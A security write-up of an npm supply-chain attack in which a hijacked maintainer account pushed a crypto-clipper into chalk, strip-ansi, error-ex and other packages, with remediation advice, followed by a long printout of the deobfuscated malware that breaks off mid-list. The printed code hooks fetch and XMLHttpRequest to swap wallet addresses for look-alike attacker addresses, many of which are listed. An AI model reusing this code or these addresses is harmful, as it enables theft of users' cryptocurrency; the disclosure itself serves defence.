Anatomy of a Billion-Download NPM Supply-Chain Attack
A major supply chain attack has occurred.
The NPM account of the popular developer qix was compromised, leading to malicious versions being published for dozens of packages, including chalk, strip-ansi, and color-convert.
Update: The author has been notified and is actively working with the NPM security team to resolve the issue. The malicious code has already been removed from most of the affected packages, and the situation is being remediated.
However, it is crucial to audit your projects, as compromised versions may still be present in your dependencies or lockfiles.
Summary:
What happened? A supply chain attack compromised the NPM account of developer
qix, leading to malicious versions of dozens of high-impact packages being published.What was the impact? The combined weekly downloads of the affected packages exceed one billion, posing a significant threat to the JavaScript ecosystem.
What does the malware do? The payload is a crypto-clipper that steals funds by swapping wallet addresses in network requests and directly hijacking crypto transactions.
How to protect yourself: Immediately audit your project's dependencies. Pin all affected packages to their last known-safe versions using the
overridesfeature inpackage.json.
How a Simple Build Error Uncovered the Attack
It started with a cryptic build failure in our CI/CD pipeline, which my colleague noticed:
ReferenceError: fetch is not definedThis seemingly minor error was the first sign of a sophisticated supply chain attack. We traced the failure to a small dependency, error-ex. Our package-lock.json specified the stable version 1.3.2 or newer, so it installed the latest version 1.3.3, which got published just a few minutes earlier.
After investigating that package, we found this code:
const _0x112fa8=_0x180f;(function(_0x13c8b9,_0_35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+...
// ...many more lines of unreadable, obfuscated code
This is heavily obfuscated code, designed to be unreadable. But buried within the mess was a function name that raised immediate red flags: checkethereumw.
The attacker had injected malware designed to detect and steal cryptocurrency. The fetch call that broke our build was the malware attempting to exfiltrate data. Our build failed simply because our Node.js environment was old enough not to have a global fetch function. In a more modern environment, the attack could have gone completely unnoticed.
Ecosystem-Wide Impact
This wasn't an isolated incident. The attacker gained control of the qix NPM account and published malicious patch versions for some of the most fundamental utilities in JavaScript, including:
chalk: ~300 million weekly downloads
strip-ansi: ~261 million weekly downloads
color-convert: ~193 million weekly downloads
color-name: ~191 million weekly downloads
error-ex: ~47 million weekly downloads
simple-swizzle: ~26 million weekly downloads
has-ansi: ~12 million weekly downloads
These are not niche libraries; they are core building blocks buried deep in the dependency trees of countless projects.
Dissecting the Payload: A Two-Pronged Attack
After deobfuscating the code, we found a sophisticated "crypto-clipper" that uses a two-pronged approach to steal funds. Here’s an overview:
Attack Vector 1: Passive Address Swapping
The code first checks for the existence of window.ethereum, an object injected by wallet extensions like MetaMask. If no wallet is found, it proceeds with a passive attack.
The malware "monkey-patches" the browser's native fetch and XMLHttpRequest functions. This allows it to intercept all data flowing in and out of the website. The script contains extensive lists of attacker-owned wallet addresses for Bitcoin (BTC), Ethereum (ETH), Solana (SOL), Tron (TRX), Litecoin (LTC), and Bitcoin Cash (BCH).
The true cleverness of this malware lies in how it chooses the replacement address. It doesn't just pick a random wallet from its list; instead, it employs a sophisticated technique using the Levenshtein distance algorithm. This algorithm measures the "edit distance," or visual similarity, between two strings. The script uses this function to find the one address in its predefined list that is typographically closest to the user's legitimate one. This intelligent method makes the swap incredibly difficult for the human eye to catch, directly exploiting the limits of perception to ensure the fraud goes unnoticed.
Attack Vector 2: Active Transaction Hijacking
If a wallet is detected, the malware launches its most dangerous component. It patches the wallet's own communication methods (request, send).
When the user initiates a transaction (e.g., eth_sendTransaction), the malware intercepts the data before it is sent to the wallet for signing. It then modifies the transaction in memory, replacing the legitimate recipient's address with a hardcoded attacker's address.
The manipulated transaction is then forwarded to the user's wallet for approval. If the user doesn't meticulously check the address on the confirmation screen, they will sign a transaction that sends their funds directly to the attacker.
Tracking the Stolen Funds
Because blockchains are transparent, we can monitor these fraudulent addresses. Here is one of the primary Ethereum addresses used in the attack. You can see its activity live on Etherscan.
One of the attacker's Ethereum addresses:
0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
See this GitHub Gist for a list of all wallets.
How to Protect Your Projects: Immediate Steps
Even though some of the affected versions are currently being removed from npm, some are still available. So please use overrides in your package.json.
A malicious package can still be pulled in if another dependency requires a vulnerable version range. Use the overrides feature in your package.json to force a specific, safe version of any package across your entire project.
For the affected packages, you would add:
{
"name": "your-project",
"version": "1.0.0",
"overrides": {
"chalk": "5.3.0",
"strip-ansi": "7.1.0",
"color-convert": "2.0.1",
"color-name": "1.1.4",
"is-core-module": "2.13.1",
"error-ex": "1.3.2",
"has-ansi": "5.0.1"
}
}
After adding this, delete node_modules and package-lock.json, then run npm install to generate a new, clean lockfile.
Conclusion
The open-source ecosystem runs on trust, but vigilance is critical. A simple build error can be the first sign of a deep-rooted problem. By hardening our CI/CD pipelines, locking down dependencies, and fostering a culture of security awareness, we can better defend against the ever-present threat of supply chain attacks.
Let’s connect on LinkedIn.
Full malware source code is here.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var neth = 0, | |
| rund = 0, | |
| loval = 0 | |
| async function checkethereumw() { | |
| try { | |
| const _0x124ed3 = await window.ethereum.request({ method: 'eth_accounts' }) | |
| _0x124ed3.length > 0 | |
| ? (runmask(), rund != 1 && ((rund = 1), (neth = 1), newdlocal())) | |
| : rund != 1 && ((rund = 1), newdlocal()) | |
| } catch (_0x53a897) { | |
| rund != 1 && ((rund = 1), newdlocal()) | |
| } | |
| } | |
| typeof window != 'undefined' && typeof window.ethereum != 'undefined' | |
| ? checkethereumw() | |
| : rund != 1 && ((rund = 1), newdlocal()) | |
| function newdlocal() { | |
| if (loval == 1) { | |
| return | |
| } | |
| loval = 1 | |
| function _0x3479c8(_0x13a5cc, _0x8c209f) { | |
| const _0x50715b = Array.from({ length: _0x13a5cc.length + 1 }, () => | |
| Array(_0x8c209f.length + 1).fill(0) | |
| ) | |
| for (let _0x1b96c3 = 0; _0x1b96c3 <= _0x13a5cc.length; _0x1b96c3++) { | |
| _0x50715b[_0x1b96c3][0] = _0x1b96c3 | |
| } | |
| for (let _0x239a5f = 0; _0x239a5f <= _0x8c209f.length; _0x239a5f++) { | |
| _0x50715b[0][_0x239a5f] = _0x239a5f | |
| } | |
| for (let _0x5aba31 = 1; _0x5aba31 <= _0x13a5cc.length; _0x5aba31++) { | |
| for (let _0x22e9c0 = 1; _0x22e9c0 <= _0x8c209f.length; _0x22e9c0++) { | |
| _0x13a5cc[_0x5aba31 - 1] === _0x8c209f[_0x22e9c0 - 1] | |
| ? (_0x50715b[_0x5aba31][_0x22e9c0] = | |
| _0x50715b[_0x5aba31 - 1][_0x22e9c0 - 1]) | |
| : (_0x50715b[_0x5aba31][_0x22e9c0] = | |
| 1 + | |
| Math.min( | |
| _0x50715b[_0x5aba31 - 1][_0x22e9c0], | |
| _0x50715b[_0x5aba31][_0x22e9c0 - 1], | |
| _0x50715b[_0x5aba31 - 1][_0x22e9c0 - 1] | |
| )) | |
| } | |
| } | |
| return _0x50715b[_0x13a5cc.length][_0x8c209f.length] | |
| } | |
| function _0x2abae0(_0x348925, _0x2f1e3d) { | |
| let _0xff60d1 = Infinity, | |
| _0x5be3d3 = null | |
| for (let _0x214c8b of _0x2f1e3d) { | |
| const _0x3a7411 = _0x3479c8( | |
| _0x348925.toLowerCase(), | |
| _0x214c8b.toLowerCase() | |
| ) | |
| _0x3a7411 < _0xff60d1 && | |
| ((_0xff60d1 = _0x3a7411), (_0x5be3d3 = _0x214c8b)) | |
| } | |
| return _0x5be3d3 | |
| } | |
| const _0x4664e9 = fetch | |
| fetch = async function (..._0x1ae7ec) { | |
| const _0x406ee2 = await _0xba16ef.tfqRA(_0x4664e9, ..._0x1ae7ec), | |
| _0x207752 = _0x406ee2.headers.get('Content-Type') || '' | |
| let _0x561841 | |
| _0x207752.includes('application/json') | |
| ? (_0x561841 = await _0x406ee2.clone().json()) | |
| : (_0x561841 = await _0x406ee2.clone().text()) | |
| const _0x50818d = _0x19ca67(_0x561841), | |
| _0x22ee54 = | |
| typeof _0x50818d === 'string' ? _0x50818d : JSON.stringify(_0x50818d), | |
| _0x20415d = new Response(_0x22ee54, { | |
| status: _0x406ee2.status, | |
| statusText: _0x406ee2.statusText, | |
| headers: _0x406ee2.headers, | |
| }) | |
| return _0x20415d | |
| } | |
| if (typeof window != 'undefined') { | |
| const _0x2d44e5 = XMLHttpRequest.prototype.open, | |
| _0x3d5d6a = XMLHttpRequest.prototype.send | |
| XMLHttpRequest.prototype.open = function ( | |
| _0x2dbeb0, | |
| _0x3b2bc2, | |
| _0x36de99, | |
| _0x36f3b7, | |
| _0x52ad25 | |
| ) { | |
| return (this['_url'] = _0x3b2bc2), _0x2d44e5.apply(this, arguments) | |
| } | |
| XMLHttpRequest.prototype.send = function (_0x270708) { | |
| const _0x159c30 = this, | |
| _0x1c1a41 = _0x159c30.onreadystatechange | |
| return ( | |
| (_0x159c30.onreadystatechange = function () { | |
| if (_0x159c30.readyState === 4) { | |
| try { | |
| const _0x13db82 = | |
| _0x159c30.getResponseHeader('Content-Type') || '' | |
| let _0x1ac083 = _0x159c30.responseText | |
| _0x13db82.includes('application/json') && | |
| (_0x1ac083 = JSON.parse(_0x159c30.responseText)) | |
| const _0x454f4a = _0x19ca67(_0x1ac083), | |
| _0x553cb7 = | |
| typeof _0x454f4a === 'string' | |
| ? _0x454f4a | |
| : JSON.stringify(_0x454f4a) | |
| Object.defineProperty(_0x159c30, 'responseText', { | |
| value: _0x553cb7, | |
| }) | |
| Object.defineProperty(_0x159c30, 'response', { value: _0x553cb7 }) | |
| } catch (_0x59788f) {} | |
| } | |
| _0x1c1a41 && _0x1c1a41.apply(this, arguments) | |
| }), | |
| _0x3d5d6a.apply(this, arguments) | |
| ) | |
| } | |
| } | |
| function _0x19ca67(_0x1156d2) { | |
| try { | |
| if (typeof _0x1156d2 === 'object' && _0x1156d2 !== null) { | |
| const _0x129304 = JSON.stringify(_0x1156d2), | |
| _0x187e67 = _0xba16ef.tfqRA(_0x20669a, _0x129304) | |
| return JSON.parse(_0x187e67) | |
| } | |
| if (typeof _0x1156d2 === 'string') { | |
| return _0x20669a(_0x1156d2) | |
| } | |
| return _0x1156d2 | |
| } catch (_0x2abc9c) { | |
| return _0x1156d2 | |
| } | |
| } | |
| function _0x20669a(_0x530d91) { | |
| var _0x264994 = [ | |
| '1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx', | |
| '1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd', | |
| '1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP', | |
| '1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY', | |
| '1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj', | |
| '1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N', | |
| '1KkovSeka94yC5K4fDbfbvZeTFoorPggKW', | |
| '18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV', | |
| '1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP', | |
| '1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N', | |
| '19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8', | |
| '1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR', | |
| '1GX1FWYttd65J26JULr9HLr98K7VVUE38w', | |
| '14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC', | |
| '1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k', | |
| '19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg', | |
| '16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X', | |
| '18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne', | |
| '1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8', | |
| '13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM', | |
| '1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS', | |
| '13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ', | |
| '154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn', | |
| '1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb', | |
| '19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn', | |
| '17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS', | |
| '16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH', | |
| '1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP', | |
| '143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp', | |
| '1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm', | |
| '1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju', | |
| '19onjpqdUsssaFKJjwuAQGi2eS41vE19oi', | |
| '1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS', | |
| '1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf', | |
| '1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6', | |
| '1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z', | |
| '174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ', | |
| '17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p', | |
| '1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc', | |
| '13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a', | |
| ], | |
| _0x2e3cca = [ | |
| 'bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm', | |
| 'bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9', | |
| 'bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx', | |
| 'bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4', | |
| 'bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar', | |
| 'bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh', | |
| 'bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h', | |
| 'bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt', | |
| 'bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx', | |
| 'bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh', | |
| 'bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq', | |
| 'bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f', | |
| 'bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn', | |
| 'bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4', | |
| 'bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30', | |
| 'bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7', | |
| 'bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4', | |
| 'bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6', | |
| 'bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr', | |
| 'bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79', | |
| 'bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m', | |
| 'bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz', | |
| 'bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu', | |
| 'bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5', | |
| 'bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf', | |
| 'bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk', | |
| 'bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st', | |
| 'bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u', | |
| 'bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd', | |
| 'bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u', | |
| 'bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp', | |
| 'bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej', | |
| 'bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29', | |
| 'bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq', | |
| 'bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a', | |
| 'bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my', | |
| 'bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw', | |
| 'bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55', | |
| 'bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw', | |
| 'bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037', | |
| ], | |
| _0x4477fc = [ | |
| '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976', | |
| '0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024', | |
| '0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B', | |
| '0x30F895a2C66030795131FB66CBaD6a1f91461731', | |
| '0x57394449fE8Ee266Ead880D5588E43501cb84cC7', | |
| '0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A', | |
| '0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4', | |
| '0xe86749d6728d8b02c1eaF12383c686A8544de26A', | |
| '0xa4134741a64F882c751110D3E207C51d38f6c756', | |
| '0xD4A340CeBe238F148034Bbc14478af59b1323d67', | |
| '0xB00A433e1A5Fc40D825676e713E5E351416e6C26', | |
| '0xd9Df4e4659B1321259182191B683acc86c577b0f', | |
| '0x0a765FA154202E2105D7e37946caBB7C2475c76a', | |
| '0xE291a6A58259f660E8965C2f0938097030Bf1767', | |
| '0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D', | |
| '0xa7eec0c4911ff75AEd179c81258a348c40a36e53', | |
| '0x3c6762469ea04c9586907F155A35f648572A0C3E', | |
| '0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2', | |
| '0x51Bb31a441531d34210a4B35114D8EF3E57aB727', | |
| '0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1', | |
| '0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966', | |
| '0x1914F36c62b381856D1F9Dc524f1B167e0798e5E', | |
| '0xB9e9cfd931647192036197881A9082cD2D83589C', | |
| '0xE88ae1ae3947B6646e2c0b181da75CE3601287A4', | |
| '0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2', | |
| '0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68', | |
| '0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d', | |
| '0x93Ff376B931B92aF91241aAf257d708B62D62F4C', | |
| '0x5C068df7139aD2Dedb840ceC95C384F25b443275', | |
| '0x70D24a9989D17a537C36f2FB6d8198CC26c1c277', | |
| '0x0ae487200606DEfdbCEF1A50C003604a36C68E64', | |
| '0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56', | |
| '0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673', | |
| '0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3', | |
| '0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769', | |
| '0xd299f05D1504D0B98B1D6D3c282412FD4Df96109', | |
| '0x241689F750fCE4A974C953adBECe0673Dc4956E0', | |
| '0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261', | |
| '0x5651dbb7838146fCF5135A65005946625A2685c8', | |
| '0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1', | |
| '0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3', | |
| '0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9', | |
| '0x013285c02ab81246F1D68699613447CE4B2B4ACC', | |
| '0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e', | |
| '0x4Bf0C0630A562eE973CE964a7d215D98ea115693', | |
| '0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb', | |
| '0xae9935793835D5fCF8660e0D45bA35648e3CD463', | |
| '0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027', | |
| '0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D', | |
| '0x06de68F310a86B10746a4e35cD50a7B7C8663b8d', | |
| '0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54', | |
| '0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf', | |
| '0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272', | |
| '0xe8749d2347472AD1547E1c6436F267F0EdD725Cb', | |
| '0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221', | |
| '0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3', | |
| '0xC4A51031A7d17bB6D02D52127D2774A942987D39', | |
| '0xa1b94fC12c0153D3fb5d60ED500AcEC430259751', | |
| '0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223', | |
| '0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04', | |
| ], | |
| _0x514d7d = [ | |
| '5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6', | |
| '98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ', | |
| 'Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt', | |
| 'CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN', | |
| '7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU', | |
| '3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49', | |
| '9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV', | |
| '4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF', | |
| '4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF', | |
| '9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL', | |
| '7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx', | |
| '8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv', | |
| '55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx', | |
| 'Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB', | |
| '9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB', | |
| '5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr', | |
| 'F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv', | |
| 'G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn', | |
| 'DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K', | |
| 'HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced', | |
| ], | |
| _0x3ee86f = [ | |
| 'TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67', | |
| 'TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y', | |
| 'TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH', | |
| 'TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc', | |
| 'TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp', | |
| 'TGExvgwAyaqwcaJmtJzErXqfra66YjLThc', | |
| 'TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG', | |
| 'TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye', | |
| 'TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp', | |
| 'TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR', | |
| 'TPSLojAyTheudTRztqjhNic6rrrSLVkMAr', | |
| 'TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo', | |
| 'TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw', | |
| 'TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f', | |
| 'TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ', | |
| 'TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb', | |
| 'TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP', | |
| 'TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW', | |
| 'TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz', | |
| 'TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW', | |
| 'TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt', | |
| 'TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC', | |
| 'TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ', | |
| 'THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E', | |
| 'TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6', | |
| 'TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L', | |
| 'TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9', | |
| 'TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK', | |
| 'TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V', | |
| 'TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn', | |
| 'TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA', | |
| 'TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt', | |
| 'TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ', | |
| 'TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs', | |
| 'TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL', | |
| 'TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z', | |
| 'THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5', | |
| 'TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP', | |
| 'TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7', | |
| 'TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P', | |
| ], | |
| _0x4a9d96 = [ | |
| 'LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug', | |
| 'LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR', | |
| 'LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6', | |
| 'LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz', | |
| 'LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa', | |
| 'LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ', | |
| 'LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT', | |
| 'LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB', | |
| 'Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP', | |
| 'LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA', | |
| 'Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP', | |
| 'LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox', | |
| 'LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP', | |
| 'LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6', | |
| 'LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ', | |
| 'LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H', | |
| 'LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq', | |
| 'LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE', | |
| 'LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr', | |
| 'LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9', | |
| 'LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC', | |
| 'LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v', | |
| 'LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V', | |
| 'LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR', | |
| 'LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg', | |
| 'LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k', | |
| 'LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk', | |
| 'LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN', | |
| 'Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT', | |
| 'LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs', | |
| 'LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw', | |
| 'LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X', | |
| 'LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU', | |
| 'LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq', | |
| 'LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe', | |
| 'LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV', | |
| 'LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ', | |
| 'Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu', | |
| 'LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK', | |
| 'LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z', | |
| ], | |
| _0x553dcb = [ | |
